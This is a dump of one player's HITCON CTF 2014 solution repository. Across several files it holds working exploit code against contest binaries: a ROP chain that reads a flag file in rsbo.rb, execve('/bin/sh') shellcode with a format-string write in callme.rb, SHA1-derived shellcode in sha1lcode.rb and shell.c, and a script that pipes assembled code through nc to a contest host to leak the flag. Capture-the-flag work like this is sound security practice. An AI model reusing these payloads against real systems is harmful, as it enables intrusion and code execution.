├── README.md ├── rsbo-hack ├── rsbo-4a707e7d07e87ab97348be36efea28dc ├── callme-69d26b77eb41e4eeba1d7b8402a8b165 ├── gen_mid_test.rb ├── Makefile ├── callme_no_alarm.rb ├── polyglot.txt ├── ty_search.rb ├── sha1lcode_gen.rb ├── hop_trace.rb ├── ducky.c ├── rsbo.rb ├── ty.rb ├── tarmful.rb ├── ty.S ├── shell.c ├── callme.c ├── sha1lcode.rb ├── callme.rb ├── 24.rb ├── hop.cc ├── pneu.rb ├── mid.c ├── sha1_find.cc ├── rsbo_rop.txt ├── hop_graph.cc ├── rsbo2.txt ├── rsbo.txt ├── callme.txt └── de.txt /README.md: -------------------------------------------------------------------------------- 1 | My submission for HITCON CTF 2014. 2 | 3 | -------------------------------------------------------------------------------- /rsbo-hack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shinh/hitcon-ctf-2014/master/rsbo-hack -------------------------------------------------------------------------------- /rsbo-4a707e7d07e87ab97348be36efea28dc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shinh/hitcon-ctf-2014/master/rsbo-4a707e7d07e87ab97348be36efea28dc -------------------------------------------------------------------------------- /callme-69d26b77eb41e4eeba1d7b8402a8b165: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shinh/hitcon-ctf-2014/master/callme-69d26b77eb41e4eeba1d7b8402a8b165 -------------------------------------------------------------------------------- /gen_mid_test.rb: -------------------------------------------------------------------------------- 1 | # N = 99999 2 | # a = [] 3 | # N.times{ 4 | # a << rand(3) 5 | # } 6 | 7 | N = 99999 8 | a = [] 9 | N.times{ 10 | a << rand(2**63) - 2 ** 62 11 | } 12 | 13 | puts N 14 | puts a * ' ' 15 | puts 16 | puts '__INPUT__' 17 | puts a.sort[N/2] 18 | puts 19 | puts '__OUTPUT__' 20 | 
-------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | all: hop hop_graph sha1_find 2 | 3 | hop: hop.cc 4 | $(CXX) -std=gnu++11 -o $@ $< -g -fPIC -pie 5 | 6 | hop_graph: hop_graph.cc 7 | $(CXX) -std=gnu++11 -o $@ $< -g -fPIC -pie -O2 8 | 9 | sha1_find: sha1_find.cc 10 | $(CXX) -std=gnu++11 -o $@ $< -g -fPIC -pie -O2 -lcrypto 11 | 12 | 13 | -------------------------------------------------------------------------------- /callme_no_alarm.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | # -*- coding: binary -*- 3 | 4 | c = File.open('callme-69d26b77eb41e4eeba1d7b8402a8b165', 'r:binary').read 5 | #STDERR.puts c[0x68f, 5].inspect 6 | c[0x71c,5] = "\x90" * 5 7 | c[0x73e,5] = "\x90" * 5 8 | File.open('callme-hack', 'w:binary') do |of| 9 | of.print(c) 10 | end 11 | system("chmod 755 callme-hack") 12 | -------------------------------------------------------------------------------- /polyglot.txt: -------------------------------------------------------------------------------- 1 | a=42//33;--a;''';/+%q( 2 | ;b=42//33;{- 3 | ; 4 | #include 5 | #include 6 | int main(){ 7 | char buf[999]; 8 | int fd = open("flag", O_RDONLY); 9 | int len = read(fd, buf, 999); 10 | write(1, buf, len); 11 | return 0; 12 | } 13 | /* 14 | 15 | -} 16 | (//)=(/) 17 | main = do 18 | str <- readFile "flag" 19 | putStr str 20 | {- 21 | 22 | ) 23 | BEGIN{ 24 | print File.read('flag') 25 | exit 26 | } 27 | %q( 28 | 29 | ''' 30 | import sys 31 | sys.stdout.write(open('flag').read()) 32 | ''' 33 | 34 | )#*///-}--''' 35 | -------------------------------------------------------------------------------- /ty_search.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # HITCON{HAve_FuN_4_NXTGen_P1at4|m} 4 | 5 | tmpl = File.read('ty.S') 6 | 7 | ans = '' 8 | 9 | 
33.times{|i| 10 | u = 128 11 | l = 0 12 | 13 | while l + 1 != u 14 | c = (u + l) / 2 15 | puts "#{i}: #{l} #{c} #{u}" 16 | 17 | code = tmpl.sub(/#\d+\].*?\/\/ index/, "##{i}] // index") 18 | code = code.sub(/\d+\s+\/\/ value/, "#{c} // value") 19 | 20 | File.open('/tmp/ty.S', 'w') do |of| 21 | of.print(code) 22 | end 23 | 24 | if `ruby ty.rb /tmp/ty.S | nc 210.71.253.109 9123` =~ /qemu/ 25 | l = c 26 | else 27 | u = c 28 | end 29 | end 30 | ans += u.chr 31 | puts ans 32 | } 33 | -------------------------------------------------------------------------------- /sha1lcode_gen.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require 'digest' 4 | 5 | ('aaaaaaaa'..'zzzzzzzz').each do |s| 6 | s = s * 2 7 | dig = Digest::SHA1.hexdigest(s) 8 | #p dig 9 | #if dig !~ /^ffc0eb10/ 10 | #if dig !~ /^eb24/ 11 | #if dig !~ /^eb23/ 12 | #if dig !~ /0f05$/ 13 | if dig !~ /^0f05/ 14 | next 15 | end 16 | 17 | tmp = '/tmp/b' 18 | File.open(tmp, 'w') do |of| 19 | of.print dig.chars.each_slice(2).map{|c|c.join.hex.chr}.join 20 | end 21 | 22 | dump = `objdump -b binary -m i386:x86-64 -D #{tmp}` 23 | #if dump =~ /\(bad\)|\.byte|fwait|lahf|icebp|vminpd|call|ret/ 24 | # next 25 | #end 26 | 27 | puts "=== #{s} ===" 28 | puts dump 29 | end 30 | 31 | -------------------------------------------------------------------------------- /hop_trace.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | pipe = IO.popen(['gdb', 'hop'], 'r+') 4 | 5 | pipe.puts 'b hop.cc:78' 6 | #pipe.puts "run BITCON{01234567890123456789012345678901}" 7 | pipe.puts "run HITCON{01234567890123456789012345678901}" 8 | pipe.puts "p argv[1]" 9 | 10 | done = false 11 | while !done 12 | pipe.puts 'si' 13 | pipe.puts 'disas $rip,$rip+1' 14 | pipe.puts 'p $rax' 15 | pipe.puts 'p "marKer"' 16 | 17 | while l = pipe.gets 18 | if l =~ /marKer/ 19 | break 20 | end 21 | 22 | puts l 23 | 24 | if l =~ /printf/ 
25 | pipe.puts 'cont' 26 | done = true 27 | break 28 | end 29 | end 30 | end 31 | 32 | pipe.close_write 33 | puts pipe.read 34 | 35 | -------------------------------------------------------------------------------- /ducky.c: -------------------------------------------------------------------------------- 1 | #include"linux/acct.h" 2 | #include"stdio.h" 3 | 4 | #undef HZ 5 | #define HZ 6 | 7 | int main AHZ 8 | 9 | #undef HZ 10 | #define HZ "/home/ducky/flag", 0 11 | 12 | #define struct 13 | #define utimbuf 14 | #define __kernel_time_t 15 | #define actime open AHZ 16 | #define modtime step2 AHZ 17 | 18 | #include"linux/utime.h" 19 | 20 | 21 | #undef HZ 22 | #define HZ 23 | int step2 AHZ 24 | 25 | #undef HZ 26 | #define HZ 3, stderr, 999 27 | 28 | #define actime read AHZ 29 | #define modtime step3 AHZ 30 | 31 | #undef _LINUX_UTIME_H 32 | #include"linux/utime.h" 33 | 34 | 35 | #undef HZ 36 | #define HZ 37 | int step3 AHZ 38 | 39 | #undef HZ 40 | #define HZ stderr 41 | 42 | #define actime puts AHZ 43 | #define modtime 44 | 45 | #undef _LINUX_UTIME_H 46 | #include"linux/utime.h" 47 | -------------------------------------------------------------------------------- /rsbo.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | #o = 'hoge' * (0x50 / 4) 4 | o = "\0" * 0x50 5 | 6 | #o << [0, 0].pack('L2') 7 | #o << 'fugafuga' 8 | #o << 'fugafuga' 9 | #o << [0xffffffff, 0xffffffff, 0xffffffff, 0xffffffff].pack('L4') 10 | o << [0, 0, 0, 0].pack('L4') 11 | 12 | data = 0x0804a040 13 | 14 | #o << [0, 0, 0x0804a040, 0xdead].pack('L4') 15 | o << [0, 0, 0x0804a040, 0x08048671].pack('L4') 16 | o << [0xdeadd, 0x0804a040, 255, 0xdead].pack('L4') 17 | #o << [0x0804a040, 0xdead, 0, 0].pack('L4') 18 | 19 | pop2_ret = 0x0804879e 20 | pop3_ret = 0x0804879d 21 | 22 | # Secondary payload 23 | o << [0].pack('L*') 24 | o << [0x08048420, pop2_ret, 0x80487d0, 0].pack('L*') # open 25 | o << [0x080483e0, pop3_ret, 3, data+200, 
256].pack('L*') # read 26 | o << [0x08048450, pop3_ret, 1, data+200, 256].pack('L*') # write 27 | 28 | 29 | #o << [0, 0, 0, 0].pack('L4') 30 | 31 | #o << [0x0804865c].pack('L') 32 | 33 | print o 34 | 35 | -------------------------------------------------------------------------------- /ty.rb: -------------------------------------------------------------------------------- 1 | require 'socket' 2 | 3 | asm = ARGV[0] || 'ty.S' 4 | 5 | #out = TCPSocket.new('210.71.253.109', 9123) 6 | out = STDOUT 7 | 8 | system("LD_LIBRARY_PATH=/usr/lib/aarch64/usr/lib ./aarch64/usr/bin/aarch64-linux-gnu-as #{asm}") 9 | 10 | o = '' 11 | `aarch64-linux-gnu-objdump -S a.out`.each_line do |line| 12 | if line =~ /411[0-9a-f]{3}:\s+([0-9a-f]{8})/ 13 | o << [$1.hex].pack('V') 14 | end 15 | end 16 | 17 | while o.size < 220 18 | o << "\0" 19 | end 20 | 21 | out.print "#{o.size}" + "\0" * 5 22 | out.print o 23 | out.print "\0" * o.size 24 | 25 | if out != STDOUT 26 | out.close_write 27 | puts out.read 28 | end 29 | 30 | #puts 123 31 | #print ' ' * 123 32 | 33 | #puts 999 34 | 35 | # 1.upto(1000) do |i| 36 | # print i, " " 37 | # system("echo #{i} | aarch64/usr/bin/qemu-aarch64-static ./ty-b83f0d0edeb8cfad76d30eddc58da139 2>&1") 38 | # #pipe = IO.popen('aarch64/usr/bin/qemu-aarch64-static ./ty-b83f0d0edeb8cfad76d30eddc58da139 2>&1', 'r+') 39 | # #pipe.puts(i) 40 | # #pipe.close_write 41 | # #print i, " ", pipe.read 42 | # #puts 43 | # #STDOUT.flush 44 | # end 45 | -------------------------------------------------------------------------------- /tarmful.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | skipto = nil 4 | skipto = '496_solve' 5 | 6 | if skipto 7 | f = skipto 8 | else 9 | f = 'tarmful-3f13b82f7794de783adfd6fa9928ad2c.zip' 10 | 11 | system("rm -fr /tmp/work") 12 | system("mkdir -p /tmp/work") 13 | system("cp #{f} /tmp/work") 14 | end 15 | 16 | Dir.chdir("/tmp/work") 17 | 18 | while true 19 | type = `file #{f}` 20 | if 
f =~ /\.zip/ || type =~ /Zip archive/ 21 | o = `unzip #{f}` 22 | puts o 23 | 24 | f = o[/(extracting|inflating): (.*)/, 2].strip 25 | 26 | #f = o[/extracting: (.*\.zip)/, 1] 27 | #if !f 28 | # f = o[/inflating: (.*\.tar\.(bz2|gz))/, 1] 29 | #end 30 | elsif f =~ /\.tar\..*/ || type =~ /bzip2|gzip/ 31 | pipe = IO.popen(['tar', '-xvf', f]) 32 | o = pipe.read 33 | pipe.close 34 | puts o 35 | 36 | #f = o[/^\d+\/\d+\.(tar\.|zip).*/] 37 | f = o[/^.*\Z/] 38 | 39 | f.gsub!(/\\\\/, '\\') 40 | else 41 | raise "Unknown file type #{f}" 42 | end 43 | 44 | n = f.tr("/\\: `'\"()<>", '___________') 45 | n.gsub!(/\W/, '_') 46 | n.gsub!(/\\/, '_') 47 | n.sub!(/;.*/, '') 48 | 49 | puts "#{f} => #{n}" 50 | File.rename(f, n) 51 | f = n 52 | 53 | if !File.exist?(f) 54 | raise f 55 | end 56 | end 57 | -------------------------------------------------------------------------------- /ty.S: -------------------------------------------------------------------------------- 1 | .org 0x400590 2 | exit: 3 | .org 0x4005a0 4 | open: 5 | .org 0x4005e0 6 | puts: 7 | .org 0x400610 8 | read: 9 | 10 | .org 0x411468 11 | adrp x0, 411000 12 | add x0, x0, #filename - 0x411000 13 | mov x1, #0 14 | bl open 15 | cmp w0, #-1 16 | b.ne cont 17 | ret 18 | cont: 19 | mov x2, #99 20 | adrp x1, 411000 21 | add x1, x1, #hello - 0x411000 22 | bl read 23 | 24 | adrp x0, 411000 25 | add x0, x0, #hello - 0x411000 26 | bl puts 27 | 28 | adrp x1, 411000 29 | add x1, x1, #hello - 0x411000 30 | 31 | ldrb w2, [x1, #0] // index 32 | cmp x2, 50 // value 33 | 34 | b.hi hello 35 | 36 | bl exit 37 | filename: 38 | .string "/home/ty/flag" 39 | .byte 0, 0, 0, 0, 0, 0 40 | hello: 41 | .string "hell" 42 | .byte 0, 0, 0, 0 43 | .byte 0, 0, 0, 0 44 | .byte 0, 0, 0, 0 45 | .byte 0, 0, 0, 0 46 | .byte 0, 0, 0, 0 47 | .byte 0, 0, 0, 0 48 | .byte 0, 0, 0, 0 49 | .byte 0, 0, 0, 0 50 | .byte 0, 0, 0, 0 51 | .byte 0, 0, 0, 0 52 | .byte 0, 0, 0, 0 53 | .byte 0, 0, 0, 0 54 | .byte 1,1,1,1 55 | 
-------------------------------------------------------------------------------- /shell.c: -------------------------------------------------------------------------------- 1 | char buf[99999]; 2 | 3 | int main() { 4 | const char* args[] = { "/bin/sh", 0 }; 5 | asm("mov %0, %%rax\n" 6 | 7 | "mov %%rax, %%rsi\n" 8 | 9 | "mov %%rax, %%rdx\n" 10 | "inc %%rdx\n" 11 | "inc %%rdx\n" 12 | "inc %%rdx\n" 13 | "inc %%rdx\n" 14 | "inc %%rdx\n" 15 | "inc %%rdx\n" 16 | "inc %%rdx\n" 17 | "inc %%rdx\n" 18 | "inc %%rdx\n" 19 | "inc %%rdx\n" 20 | "inc %%rdx\n" 21 | "inc %%rdx\n" 22 | "inc %%rdx\n" 23 | "inc %%rdx\n" 24 | "inc %%rdx\n" 25 | "inc %%rdx\n" 26 | "mov %%rdx, (%%rax)\n" 27 | 28 | "add $8, %%rax\n" 29 | "xor %%rdx, %%rdx\n" 30 | "mov %%rdx, (%%rax)\n" 31 | 32 | "add $8, %%rax\n" 33 | "mov %%rax, %%rdi\n" 34 | 35 | "movb $47, (%%rax)\n" 36 | "inc %%rax\n" 37 | 38 | "movb $98, (%%rax)\n" 39 | "inc %%rax\n" 40 | 41 | "movb $105, (%%rax)\n" 42 | "inc %%rax\n" 43 | 44 | "movb $110, (%%rax)\n" 45 | "inc %%rax\n" 46 | 47 | "movb $47, (%%rax)\n" 48 | "inc %%rax\n" 49 | 50 | "movb $115, (%%rax)\n" 51 | "inc %%rax\n" 52 | 53 | "movb $104, (%%rax)\n" 54 | "inc %%rax\n" 55 | 56 | "movb $0, (%%rax)\n" 57 | "inc %%rax\n" 58 | 59 | //"mov (%1), %%rdi\n" 60 | //"mov %1, %%rsi\n" 61 | "mov %%rsi, %%rdx\n" 62 | 63 | "xor %%rax, %%rax\n" 64 | "mov $59, %%rax\n" 65 | "syscall\n" 66 | ::"r"(buf), "r"(args) 67 | :"%rax", "%rdi", "%rsi", "%rdx"); 68 | } 69 | -------------------------------------------------------------------------------- /callme.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | char g_buf[0x400]; 5 | time_t g_ptim; 6 | 7 | void read_line(char* b, int n); 8 | void print(char* b); 9 | 10 | void show_msg(const char* time_str, const char* fmt) { 11 | char buf[0xb0]; 12 | sprintf(buf, fmt, time_str, g_buf); /* NOTE(review): unbounded write - g_buf is 0x400 bytes and is filled by read_line(g_buf, 0x400), while buf is 0xb0 bytes; snprintf(buf, sizeof buf, ...) would cap the copy */ 13 | print(buf); 14 | } 15 | 16 | void show() { 17 | char tmfmt[] = " %2$s\n\0\0%s%s\n\0\0\0\0\0\0\0\0\0\0\0"; 
18 | time_t tim; 19 | struct tm* tm; 20 | char buf[80]; 21 | 22 | time(&tim); 23 | tm = localtime(&tim); 24 | strftime(buf, 80, "%H:%M:%S ", tm); 25 | 26 | if (g_ptim != tim) { 27 | g_ptim = tim; 28 | show_msg(buf, tmfmt + 16); 29 | } else { 30 | show_msg(buf, tmfmt); 31 | } 32 | } 33 | 34 | void record_msg() { 35 | for (;;) { 36 | read_line(g_buf, 0x400); 37 | if (g_buf[0] == 'E' && g_buf[1] == 'N' && g_buf[2] == 'D' && !g_buf[3]) { 38 | return; 39 | } 40 | show(); 41 | } 42 | } 43 | 44 | int main() { 45 | int i; 46 | char buf[4]; 47 | 48 | alarm(30); 49 | for (i = 0; i < 3; i++) { 50 | print("."); 51 | sleep(1); 52 | } 53 | 54 | print("Sorry, we are not able to take your call right now.\n"); 55 | print("Do you want to leave a message (y/n)? "); 56 | 57 | read_line(buf, 4); 58 | if (buf[0] != 'y') { 59 | print("Bye!\n"); 60 | } else { 61 | record_msg(); 62 | } 63 | } 64 | 65 | void read_line(char* b, int n) { 66 | for (; --n; b++) { 67 | *b = getchar(); 68 | if (*b == '\n') { 69 | break; 70 | } 71 | } 72 | *b = 0; 73 | } 74 | 75 | void print(char* b) { 76 | for (; *b; b++) { 77 | putchar(*b); 78 | fflush(stdout); 79 | } 80 | } 81 | -------------------------------------------------------------------------------- /sha1lcode.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | mov_rcx_rax = '0000000005956924' 4 | mov_rax_rsi = '0000000019221105' 5 | mov_rax_rdx = '0000000012851142' 6 | inc_rdx = '0000000008277163' 7 | mov_rdx_mrax = '0000000062517457' 8 | xor_rdx_rdx = '0000000012024928' 9 | mov_rax_rdi = '0000000039570129' 10 | movb_2f_mrax = '0000000068497096' 11 | inc_rax = '0000000021765295' 12 | movb_62_mrax = '0000000000137407' 13 | movb_69_mrax = '0000000024172868' 14 | movb_6e_mrax = '0000000024188522' 15 | movb_2f_mrax = '0000000068497096' 16 | movb_73_mrax = '0000000006453988' 17 | movb_68_mrax = '0000000004867185' 18 | movb_00_mrax = '0000000020736806' 19 | mov_rsi_rdx = '0000000003456370' 20 
| xor_rax_rax = '0000000011556553' 21 | 22 | $jmp_3 = 'aaaafqcuaaaafqcu' 23 | $jmp_2 = 'aaaaeakuaaaaeaku' 24 | #xor_eax = 'aaaabbwpaaaabbwp' 25 | #inc_eax = 'aaaahtnnaaaahtnn' 26 | 27 | syscall = 'aaaacklnaaaackln' 28 | 29 | $o = '' 30 | 31 | def out(a) 32 | $o += $jmp_3 33 | $o += a 34 | end 35 | 36 | out(mov_rax_rsi) 37 | out(mov_rax_rdx) 38 | 16.times{out(inc_rdx)} 39 | out(mov_rdx_mrax) 40 | 41 | 8.times{out(inc_rax)} 42 | out(xor_rdx_rdx) 43 | out(mov_rdx_mrax) 44 | 45 | 8.times{out(inc_rax)} 46 | out(mov_rax_rdi) 47 | 48 | [movb_2f_mrax, 49 | movb_62_mrax, 50 | movb_69_mrax, 51 | movb_6e_mrax, 52 | movb_2f_mrax, 53 | movb_73_mrax, 54 | movb_68_mrax, 55 | movb_00_mrax].each{|a| 56 | out(a) 57 | out(inc_rax) 58 | } 59 | 60 | out(mov_rsi_rdx) 61 | out(xor_rax_rax) 62 | 59.times{out(inc_rax)} 63 | 64 | $o += syscall 65 | 66 | #print $o 67 | 68 | print [$o.size / 16].pack("L*") 69 | print $o 70 | 71 | puts 'cat /home/sha1lcode/flag' 72 | #print 'a' * 1000000 73 | 74 | 75 | # pipe = IO.popen('./sha1lcode-5b43cc13b0fb249726e0ae175dbef3fe', 'r+') 76 | 77 | # while l = gets 78 | # pipe.puts l 79 | # puts pipe.gets 80 | # end 81 | -------------------------------------------------------------------------------- /callme.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | shell = %Q( 4 | 80483ea: 89 d0 mov %edx,%eax 5 | 80483ec: 89 c1 mov %eax,%ecx 6 | 80483ee: 89 c2 mov %eax,%edx 7 | 80483f0: 83 c2 08 add $0x8,%edx 8 | 80483f3: 89 10 mov %edx,(%eax) 9 | 80483f5: 83 c0 04 add $0x4,%eax 10 | 80483f8: 31 d2 xor %edx,%edx 11 | 80483fa: 89 10 mov %edx,(%eax) 12 | 80483fc: 83 c0 04 add $0x4,%eax 13 | 80483ff: 89 c3 mov %eax,%ebx 14 | 8048401: 89 c2 mov %eax,%edx 15 | 8048403: c6 02 2f movb $0x2f,(%edx) 16 | 8048406: 42 inc %edx 17 | 8048407: c6 02 62 movb $0x62,(%edx) 18 | 804840a: 42 inc %edx 19 | 804840b: c6 02 69 movb $0x69,(%edx) 20 | 804840e: 42 inc %edx 21 | 804840f: c6 02 6e movb $0x6e,(%edx) 22 | 8048412: 
42 inc %edx 23 | 8048413: c6 02 2f movb $0x2f,(%edx) 24 | 8048416: 42 inc %edx 25 | 8048417: c6 02 73 movb $0x73,(%edx) 26 | 804841a: 42 inc %edx 27 | 804841b: c6 02 68 movb $0x68,(%edx) 28 | 804841e: 42 inc %edx 29 | 804841f: 31 c0 xor %eax,%eax 30 | 8048421: 88 02 mov %al,(%edx) 31 | 8048423: 89 ca mov %ecx,%edx 32 | 8048425: b0 0b mov $0xb,%al 33 | 8048427: cd 80 int $0x80 34 | ) 35 | 36 | shell.gsub!(/ \w+:\s+/, '') 37 | shell.strip! 38 | shell.gsub!(/ .*/, '') 39 | 40 | code = shell.split.map{|b|b.hex.chr} * '' 41 | 42 | puts 'y' 43 | 44 | msg = "aaa" 45 | 46 | #msg += [0x804a018].pack('L') 47 | 48 | #msg += [0x804a018, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x804a019].pack('L') 49 | 50 | msg += [0x804a019, 0x11111111, 0x804a018].pack('L*') 51 | 52 | #"\1\1\1\1" 53 | 54 | while msg.size != 0xaa - 0x60 55 | msg += 'a' 56 | end 57 | 58 | msg += code 59 | 60 | while msg.size != 187 61 | msg += 'b' 62 | end 63 | 64 | #msg += '%09d' * 10 + ' %d' 65 | 66 | msg += '%08u' + '%04hhu' * 8 + '%0104hhu' + '%hhn' + '%010hhu' + '%hhn' 67 | 68 | #msg += '%08u' + '%04hhu' * 8 + '%0115hhu' + '%hhn' + ' %d' 69 | 70 | #msg += '%08u' + '%04hhu' * 9 + ' %d' 71 | 72 | #msg += '%08d %08d %d %d %d %d %d %d %d %d %d ' 73 | 74 | #msg += '%7$d %d %d %d %d %d %d %d %d %d %d ' 75 | 76 | 77 | puts msg 78 | 79 | puts 'cat /home/callme/flag' 80 | 81 | #puts 'a' * 267 82 | 83 | #puts 'a' * 267 + '%x' 84 | 85 | 86 | -------------------------------------------------------------------------------- /24.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require 'socket' 4 | 5 | class Float 6 | def to_i 7 | self.floor 8 | end 9 | end 10 | 11 | def solve_impl(a) 12 | if a.size == 1 13 | #if `python -c 'print abs(eval("#{a[0][1]}") - 24) >= 1e-15'` =~ /False/ 14 | # raise a[0][1] 15 | #end 16 | if (a[0][0] - 24.0).abs < 1e-15 17 | raise a[0][1] 18 | elsif (a[0][0] + 24.0).abs < 1e-15 19 | 
raise "-(#{a[0][1]})" 20 | end 21 | return 22 | end 23 | 24 | a.size.times{|i| 25 | i.times{|j| 26 | n = a[0,j] + a[j+1..i-1] + a[i+1..-1] 27 | solve_impl(n + [[a[j][0] + a[i][0], "(#{a[j][1]}+#{a[i][1]})"]]) 28 | solve_impl(n + [[a[j][0] - a[i][0], "(#{a[j][1]}-#{a[i][1]})"]]) 29 | solve_impl(n + [[a[i][0] - a[j][0], "(#{a[i][1]}-#{a[j][1]})"]]) 30 | solve_impl(n + [[a[j][0] * a[i][0], "(#{a[j][1]}*#{a[i][1]})"]]) 31 | solve_impl(n + [[a[j][0] * -a[i][0], "(#{a[j][1]}*-#{a[i][1]})"]]) 32 | solve_impl(n + [[a[j][0] ** a[i][0], "(#{a[j][1]}**#{a[i][1]})"]]) 33 | solve_impl(n + [[a[i][0] ** a[j][0], "(#{a[i][1]}**#{a[j][1]})"]]) 34 | solve_impl(n + [[a[j][0] ** -a[i][0], "(#{a[j][1]}**-#{a[i][1]})"]]) 35 | solve_impl(n + [[a[i][0] ** -a[j][0], "(#{a[i][1]}**-#{a[j][1]})"]]) 36 | if a[i][0] != 0 37 | solve_impl(n + [[a[j][0] / a[i][0], "(#{a[j][1]}/#{a[i][1]})"]]) 38 | solve_impl(n + [[a[j][0] / -a[i][0], "(#{a[j][1]}/-#{a[i][1]})"]]) 39 | solve_impl(n + [[a[i][0] / a[j][0], "(#{a[i][1]}/#{a[j][1]})"]]) 40 | solve_impl(n + [[a[i][0] / -a[j][0], "(#{a[i][1]}/-#{a[j][1]})"]]) 41 | if a[i][0] != Float::INFINITY && a[j][0] != Float::INFINITY 42 | if a[i][0].to_i != 0 43 | solve_impl(n + [[(a[j][0] / a[i][0]).to_i.to_f, 44 | "(#{a[j][1]}//#{a[i][1]})"]]) 45 | solve_impl(n + [[(a[j][0] / -a[i][0]).to_i.to_f, 46 | "(#{a[j][1]}//-#{a[i][1]})"]]) 47 | end 48 | if a[j][0].to_i != 0 49 | solve_impl(n + [[(a[i][0] / a[j][0]).to_i.to_f, 50 | "(#{a[i][1]}//#{a[j][1]})"]]) 51 | solve_impl(n + [[(a[i][0] / -a[j][0]).to_i.to_f, 52 | "(#{a[i][1]}//-#{a[j][1]})"]]) 53 | end 54 | end 55 | end 56 | } 57 | } 58 | end 59 | 60 | 61 | #solve_impl([8, 6, 11, 12].map{|v|[v.to_f, v.to_s]}) 62 | #solve_impl([13, 13, 4, 1].map{|v|[v.to_f, v.to_s]}) 63 | #exit 64 | 65 | def solve(a) 66 | begin 67 | solve_impl(a) 68 | puts 'no anser...' 69 | rescue 70 | return $! 
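71 | end 72 | return '13//13**(-1/4)' 73 | end 74 | 75 | s = TCPSocket.new('210.65.89.59', 2424) 76 | 77 | while l = s.gets 78 | puts l 79 | if l =~ /Question .*?: (\[.*?\])/ 80 | q = $1[1...-1].split(',').map{|t| Integer(t.strip)} # the list comes from the remote peer: parse it as integers (raises on anything else) instead of eval, which would execute whatever Ruby the server sends 81 | a = solve(q.map{|v|[v.to_f, v.to_s]}) 82 | puts a 83 | s.puts("#{a}") 84 | end 85 | end 86 | 87 | #q = [13, 9, 9, 3] 88 | # q = [9, 7, 8, 2] 89 | # # 9 7 8 2 90 | # solve(q.map{|v|[v.to_f, v.to_s]}) 91 | -------------------------------------------------------------------------------- /hop.cc: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | typedef unsigned char byte; 9 | 10 | const char* HOP = "hop-62fa7ade9a1fa9254361e69d70e7a7e3.exe"; 11 | 12 | /* 13 | 0 .text 002c6510 0000000000401000 0000000000401000 00000400 2**4 14 | CONTENTS, ALLOC, LOAD, READONLY, CODE 15 | 1 .data 000000a0 00000000006c8000 00000000006c8000 002c6a00 2**4 16 | CONTENTS, ALLOC, LOAD, DATA 17 | 2 .rdata 00000998 00000000006c9000 00000000006c9000 002c6c00 2**4 18 | CONTENTS, ALLOC, LOAD, READONLY, DATA 19 | 3 .pdata 00000234 00000000006ca000 00000000006ca000 002c7600 2**2 20 | CONTENTS, ALLOC, LOAD, READONLY, DATA 21 | 4 .xdata 00000200 00000000006cb000 00000000006cb000 002c7a00 2**2 22 | CONTENTS, ALLOC, LOAD, READONLY, DATA 23 | 5 .bss 00000a00 00000000006cc000 00000000006cc000 00000000 2**5 24 | ALLOC 25 | 6 .idata 00000800 00000000006cd000 00000000006cd000 002c7c00 2**2 26 | CONTENTS, ALLOC, LOAD, DATA 27 | 7 .CRT 00000068 00000000006ce000 00000000006ce000 002c8400 2**3 28 | CONTENTS, ALLOC, LOAD, DATA 29 | 8 .tls 00000068 00000000006cf000 00000000006cf000 002c8600 2**5 30 | CONTENTS, ALLOC, LOAD, DATA 31 | */ 32 | 33 | struct Section { 34 | size_t size; 35 | size_t vma; 36 | size_t off; 37 | }; 38 | 39 | Section sections[] = { 40 | { 0x2c6510, 0x401000, 0x400 }, 41 | #if 0 42 | { 0xa0, 0x6c8000, 0x2c6a00 }, 43 | { 0x2c6510, 0x401000, 0x2c }, 44 | { 0x2c6510, 0x401000, 0x400 }, 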
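45 | #endif 46 | { 0, 0, 0 } 47 | }; 48 | 49 | size_t roundup(size_t s) { 50 | return (s + 4095) & ~4095; 51 | } 52 | 53 | int main(int argc, char* argv[]) { 54 | const char* flag = "HITCON{01234567890123456789012345678901}"; 55 | if (argv[1]) 56 | flag = argv[1]; 57 | int fd = open(HOP, O_RDONLY); assert(fd >= 0); /* stop here if the image is missing, rather than calling into an empty mapping below */ 58 | 59 | for (int i = 0; sections[i].size; i++) { 60 | Section sec = sections[i]; 61 | void* r = mmap((void*)sec.vma, roundup(sec.size), 62 | PROT_READ | PROT_WRITE | PROT_EXEC, 63 | MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, -1, 0); 64 | assert(r != MAP_FAILED); 65 | 66 | lseek(fd, sec.off, SEEK_SET); 67 | ssize_t got = read(fd, (void*)sec.vma, sec.size); assert(got == (ssize_t)sec.size); /* a failed or short read would leave part of the section zero-filled */ 68 | } 69 | 70 | byte* check_func_ms = (byte*)0x401590; 71 | // mov RCX, RDI (MS => GCC ABI) 72 | check_func_ms[-3] = 0x48; 73 | check_func_ms[-2] = 0x89; 74 | check_func_ms[-1] = 0xf9; 75 | 76 | int (*check_func)(const char*); 77 | check_func = (typeof(check_func))(check_func_ms - 3); 78 | //check_func("HITCON{SO0O0OO_MaNy_7Ar_Le\\/eLs}"); 79 | //check_func("HITCON{0123456789012345678901}"); 80 | //int r = check_func("HITCON{01234567890123456789012345678901}"); 81 | int r = check_func(flag); 82 | printf("%d\n", r); 83 | } 84 | -------------------------------------------------------------------------------- /pneu.rb: -------------------------------------------------------------------------------- 1 | pneu = File.read('Pneumotoulthamicrescopicfilicoloaganiconissis-df5bb3d8f83d6d37e16560062cb231bc.txt') 2 | 3 | pneu[0] = 'm' 4 | 5 | pneu.sub!('H', 'i') 6 | 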